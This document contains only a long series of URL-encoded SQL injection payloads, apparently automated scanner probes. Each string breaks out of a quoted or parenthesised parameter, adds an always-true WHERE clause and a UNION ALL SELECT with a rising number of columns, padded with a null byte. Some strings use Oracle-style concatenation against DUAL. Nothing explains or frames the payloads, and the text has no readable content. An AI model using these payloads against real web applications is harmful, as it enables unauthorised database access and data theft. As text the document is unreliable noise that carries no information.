-6869%29%20WHERE%207684%3D7684%20UNION%20ALL%20SELECT%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%00 -9448%29%20WHERE%208017%3D8017%20UNION%20ALL%20SELECT%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%2C%208017%00 -7805%29%20WHERE%206292%3D6292%20UNION%20ALL%20SELECT%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%2C%206292%00 -7240%29%20WHERE%201005%3D1005%20UNION%20ALL%20SELECT%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%2C%201005%00 -9347%29%20WHERE%206448%3D6448%20UNION%20ALL%20SELECT%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%00 -7113%29%20WHERE%205077%3D5077%20UNION%20ALL%20SELECT%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%2C%205077%00 -2725%29%20WHERE%201717%3D1717%20UNION%20ALL%20SELECT%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%2C%201717%00 -9758%29%20WHERE%208959%3D8959%20UNION%20ALL%20SELECT%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%2C%208959%00 -7026%27%29%20WHERE%201376%3D1376%20UNION%20ALL%20SELECT%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%00 -9716%27%29%20WHERE%204092%3D4092%20UNION%20ALL%20SELECT%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%2C%204092%00 -5912%27%29%20WHERE%208073%3D8073%20UNION%20ALL%20SELECT%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%00 -5804%27%29%20WHERE%204225%3D4225%20UNION%20ALL%20SELECT%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%00 -9124%27%29%20WHERE%207933%3D7933%20UNION%20ALL%20SELECT%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%2C%207933%00 -7136%27%29%20WHERE%204582%3D4582%20UNION%20ALL%20SELECT%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%2C%204582%00 -8667%27%29%20WHERE%204464%3D4464%20UNION%20ALL%20SELECT%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%2C%204464%00 -9907%27%29%20WHERE%203243%3D3243%20UNION%20ALL%20SELECT%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%00 -2404%27%29%20WHERE%207983%3D7983%20UNION%20ALL%20SELECT%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%2C%207983%00 -6368%27%29%20WHERE%201131%3D1131%20UNION%20ALL%20SELECT%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%00 -1423%27%20WHERE%207986%3D7986%20UNION%20ALL%20SELECT%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%2C%207986%00 -8019%27%20WHERE%206279%3D6279%20UNION%20ALL%20SELECT%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%2C%206279%00 -9393%27%20WHERE%209552%3D9552%20UNION%20ALL%20SELECT%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%00 -4869%27%20WHERE%204675%3D4675%20UNION%20ALL%20SELECT%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%2C%204675%00 -2783%27%20WHERE%203061%3D3061%20UNION%20ALL%20SELECT%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%2C%203061%00 -2217%27%20WHERE%202131%3D2131%20UNION%20ALL%20SELECT%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%2C%202131%00 -2257%27%20WHERE%206847%3D6847%20UNION%20ALL%20SELECT%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%00 -6928%27%20WHERE%203435%3D3435%20UNION%20ALL%20SELECT%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%00 -4390%27%20WHERE%203273%3D3273%20UNION%20ALL%20SELECT%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%2C%203273%00 -3272%27%20WHERE%201929%3D1929%20UNION%20ALL%20SELECT%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%00 -9660%22%20WHERE%205503%3D5503%20UNION%20ALL%20SELECT%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%2C%205503%00 -6474%22%20WHERE%207716%3D7716%20UNION%20ALL%20SELECT%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%2C%207716%00 -9052%22%20WHERE%209413%3D9413%20UNION%20ALL%20SELECT%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%2C%209413%00 -4509%22%20WHERE%207968%3D7968%20UNION%20ALL%20SELECT%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%2C%207968%00 -2514%22%20WHERE%205251%3D5251%20UNION%20ALL%20SELECT%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%00 -5575%22%20WHERE%201573%3D1573%20UNION%20ALL%20SELECT%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%2C%201573%00 -4015%22%20WHERE%208805%3D8805%20UNION%20ALL%20SELECT%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%2C%208805%00 -6481%22%20WHERE%207404%3D7404%20UNION%20ALL%20SELECT%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%2C%207404%00 -8048%22%20WHERE%201070%3D1070%20UNION%20ALL%20SELECT%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%2C%201070%00 -1079%22%20WHERE%208572%3D8572%20UNION%20ALL%20SELECT%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%2C%208572%00 -4352%27%20%7C%7C%20%28SELECT%208932%20FROM%20DUAL%20WHERE%208595%3D8595%20UNION%20ALL%20SELECT%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%2C%208595%00%20%29%20%7C%7C%20%27 -9788%27%20%7C%7C%20%28SELECT%207543%20FROM%20DUAL%20WHERE%204315%3D4315%20UNION%20ALL%20SELECT%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%2C%204315%00%20%29%20%7C%7C%20%27 -4810%27%20%7C%7C%20%28SELECT%208930%20FROM%20DUAL%20WHERE%201933%3D1933%20UNION%20ALL%20SELECT%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%2C%201933%00%20%29%20%7C%7C%20%27 -7292%27%20%7C%7C%20%28SELECT%204727%20FROM%20DUAL%20WHERE%201514%3D1514%20UNION%20ALL%20SELECT%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%2C%201514%00%20%29%20%7C%7C%20%27 -9038%27%20%7C%7C%20%28SELECT%204029%20FROM%20DUAL%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%00%20%29%20%7C%7C%20%27 -9382%27%20%7C%7C%20%28SELECT%206790%20FROM%20DUAL%20WHERE%203563%3D3563%20UNION%20ALL%20SELECT%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%00%20%29%20%7C%7C%20%27 -3038%27%20%7C%7C%20%28SELECT%204150%20FROM%20DUAL%20WHERE%207688%3D7688%20UNION%20ALL%20SELECT%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%2C%207688%00%20%29%20%7C%7C%20%27 -7790%27%20%7C%7C%20%28SELECT%209400%20FROM%20DUAL%20WHERE%208592%3D8592%20UNION%20ALL%20SELECT%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%00%20%29%20%7C%7C%20%27 -5309%27%20%7C%7C%20%28SELECT%206453%20FROM%20DUAL%20WHERE%204875%3D4875%20UNION%20ALL%20SELECT%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%00%20%29%20%7C%7C%20%27 